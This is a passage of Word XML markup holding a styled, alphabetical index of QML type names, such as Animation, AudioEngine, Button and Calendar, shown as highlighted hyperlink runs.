                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AnimatedSprite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28" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Animation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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AnimationController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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Animator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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ApplicationWindow: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32" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ApplicationWindow: QtQuickControls2</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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ApplicationWindowStyle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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AreaSeries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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AttenuationModelInverse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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AttenuationModelLinear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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Attractor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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Attribute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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Audio</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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AudioCategory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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AudioEngine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42" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AudioListener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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AudioSample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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AuthenticationDialogRequest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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Axis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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AxisAccumulator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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AxisSetting</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63" w:name="b"/>
            <w:bookmarkEnd w:id="1163"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>B</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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BackspaceKey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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Bar3DSeries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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BarCategoryAxis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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BarDataProxy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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Bars3D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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BarSeries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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BarSet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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BaseKey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756" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Behavior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757" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Binding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758" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Blend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759" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BlendEquation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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BlendEquationArguments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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BluetoothDiscoveryModel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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BluetoothService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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BluetoothSocket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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>bool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765" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BorderImage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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BorderImageMesh</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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BoxPlotSeries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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BoxSet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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BrightnessContrast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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Buffer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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BusyIndicator: QtQuickControls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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BusyIndicator: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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>BusyIndicatorStyle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774" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Button: QtQuickControls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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Button: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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ButtonAxisInput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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ButtonGroup</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778" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ButtonStyle</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1164" w:name="c"/>
            <w:bookmarkEnd w:id="1164"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C</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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Calendar: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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Calendar: QtLabsCalendar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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CalendarModel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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CalendarStyle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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
